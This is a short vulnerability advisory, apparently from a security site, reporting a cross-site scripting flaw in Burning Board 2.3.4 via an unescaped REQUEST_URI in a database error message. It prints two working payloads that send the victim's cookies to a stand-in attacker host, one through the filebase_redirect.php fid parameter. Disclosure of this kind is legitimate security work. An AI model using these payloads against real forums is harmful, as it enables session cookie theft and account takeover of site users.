Xss in Wbb 2.3.4

Credit: r57shell
Risk: Low
Local: No
Remote: Yes

CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

hi again friends i discovered a xss in wbb again ;) in wbb/acp/lib/class_db_mysql.php in the 123.line $errormsg .= "<b>Script:</b> ".getenv("REQUEST_URI")."n<br>"; hmm what can we do with that? if there is an sql db error you may do /wbb/xx.php?<script>location.href='http://yoursite.com/xss.php?cook='+es cape(document.cookie)</script> or you may use filebase mod for make an sql error like that http://www.wbbsite.com/filebase_redirect.php?fid='<script>location.href= 'http://yoursite.com/xss.php?cook='+escape(document.cookie)</script> WwW.SpyMasterSnake.org Tontonq ;)

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2023, cxsecurity.com


Back to Top